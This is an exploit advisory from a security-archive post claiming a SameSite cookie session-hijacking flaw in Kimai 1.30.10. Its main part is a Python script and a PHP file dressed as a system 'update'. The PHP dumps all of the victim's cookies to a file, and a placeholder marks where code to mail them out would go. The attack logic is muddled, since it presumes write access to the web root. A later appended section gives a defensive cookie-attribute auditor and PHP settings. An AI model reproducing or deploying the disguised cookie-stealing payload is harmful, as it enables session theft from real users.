Kimai-1.30.10 SameSite Cookie-Vulnerability session hijacking

## Exploit Title: Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking
## Author: nu11secur1ty
## Date: 02.23.2023
## Vendor: https://www.kimai.org/
## Software: https://github.com/kimai/kimai/releases/tag/1.30.10
## Reference: https://www.thesslstore.com/blog/the-ultimate-guide-to-session-hijacking-aka-cookie-hijacking/
## Reference: https://portswigger.net/support/using-burp-to-hack-cookies-and-manipulate-sessions

## Description:
Kimai-1.30.10 is vulnerable to SameSite-Cookie-Vulnerability session hijacking. The attacker can trick the victim into updating or upgrading the system by using a very malicious exploit to steal his vulnerable cookie and get control of his session.

STATUS: HIGH Vulnerability

[+] Exploit:

## WARNING: The EXPLOIT IS FOR ADVANCED USERS!

This is only one example:

```python
#!/usr/bin/python
import os
import webbrowser
import time

# Open the Kimai login page in the default browser and wait for the user to sign in.
webbrowser.open('https://pwnedhost.com/kimai-1.30.10/public/en/login')
input("After you log in please press any key to continue...")

# Copy Update.php into the public web root of the local XAMPP Kimai install
# (the script runs on the machine that hosts that directory).
os.system("copy Update.php C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\")
time.sleep(3)

# Request Update.php in the browser so it runs with the logged-in session's cookies.
webbrowser.open('https://pwnedhost.com/kimai-1.30.10/public/Update.php')
time.sleep(3)

# Collect the PoC.txt that Update.php wrote, then clean up both files.
os.system("copy C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\PoC.txt C:\\Users\\venvaropt\\Desktop\\Kimai-1.30.10\\PoC\\")
# Your mail-sending code must be here ;)
time.sleep(7)
os.system("del C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\PoC.txt")
os.system("del C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\Update.php")
```

-----------------------------------------

```php
<?php
//echo '<pre>';
//print_r( $_COOKIE );
//die();

// Dump every cookie the browser sent with this request into PoC.txt.
$fp = fopen('PoC.txt', 'w');
fwrite($fp, print_r($_COOKIE, TRUE));
fclose($fp);
echo "DONE: Now you are already updated!
Enjoy your system Kimai1.30.10 stable (Ayumi)";
?>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kimai/2023/Kimai-1.30.10)

## Proof and Exploit:
[href](https://streamable.com/md9fmr)

## Time spent:
03:00:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/
https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
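The defensive check that corresponds to this advisory is to verify that the application's session cookie is issued with the Secure, HttpOnly and SameSite attributes, since those attributes are what limit what a cookie can do once it is exposed over plain HTTP, to page scripts, or on cross-site requests. The following is an added example, not code from the advisory or from the Kimai project: a small Python auditor that parses Set-Cookie header values and reports missing or inconsistent attributes. The header lines it runs on are constructed for illustration, and the cookie names in them are placeholders, not Kimai's actual cookie names.

```python
"""Audit Set-Cookie headers for the attributes that limit session hijacking.

Added example, not part of the advisory or of Kimai. The sample headers at
the bottom are constructed; the cookie names are placeholders.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple, Union

AttrValue = Union[str, bool]


@dataclass
class CookieAudit:
    name: str
    attributes: Dict[str, AttrValue]
    findings: List[str] = field(default_factory=list)


def parse_set_cookie(header: str) -> Tuple[str, str, Dict[str, AttrValue]]:
    """Split one Set-Cookie value into (name, value, {attr_lowercase: value}).

    Flag attributes that carry no value (Secure, HttpOnly) map to True.
    """
    parts = [p.strip() for p in header.split(";")]
    if "=" not in parts[0]:
        raise ValueError("Set-Cookie without a name=value pair: %r" % header)
    name, value = parts[0].split("=", 1)
    attrs: Dict[str, AttrValue] = {}
    for part in parts[1:]:
        if not part:
            continue
        if "=" in part:
            key, val = part.split("=", 1)
            attrs[key.strip().lower()] = val.strip()
        else:
            attrs[part.lower()] = True
    return name.strip(), value, attrs


def audit_cookie(header: str) -> CookieAudit:
    """Return the findings for one Set-Cookie header value."""
    name, _value, attrs = parse_set_cookie(header)
    audit = CookieAudit(name=name, attributes=attrs)
    secure = "secure" in attrs
    samesite = attrs.get("samesite")
    samesite_norm = samesite.lower() if isinstance(samesite, str) else None

    if not secure:
        audit.findings.append("missing Secure: cookie is also sent over plain HTTP")
    if "httponly" not in attrs:
        audit.findings.append("missing HttpOnly: readable from page scripts via document.cookie")
    if samesite_norm is None:
        audit.findings.append("missing SameSite: relying on the browser default; set Lax or Strict")
    elif samesite_norm == "none" and not secure:
        audit.findings.append("SameSite=None without Secure: modern browsers reject this combination")
    elif samesite_norm not in ("lax", "strict", "none"):
        audit.findings.append("unrecognised SameSite value %r" % samesite)
    return audit


def audit_headers(set_cookie_values: List[str]) -> Dict[str, List[str]]:
    """Map each cookie name to its findings; an empty list means it passed."""
    return {a.name: a.findings for a in (audit_cookie(h) for h in set_cookie_values)}


# Constructed sample response headers (placeholder cookie names, not Kimai's).
SAMPLE_HEADERS = [
    "PHPSESSID=abc123; Path=/",
    "PHPSESSID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
    "remember=tok; Path=/; SameSite=None; HttpOnly",
]

if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        result = audit_cookie(header)
        status = "OK" if not result.findings else "WEAK"
        print("%-4s %s" % (status, header))
        for finding in result.findings:
            print("     - " + finding)
```

In a PHP deployment the server-side knobs for these attributes are the `session.cookie_secure`, `session.cookie_httponly` and `session.cookie_samesite` ini settings (the last one available since PHP 7.3); after changing them, running the audit over the live login response's Set-Cookie headers is the way to confirm the settings actually took effect.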

Source: cxsecurity.com/issue/WLB-2023040032
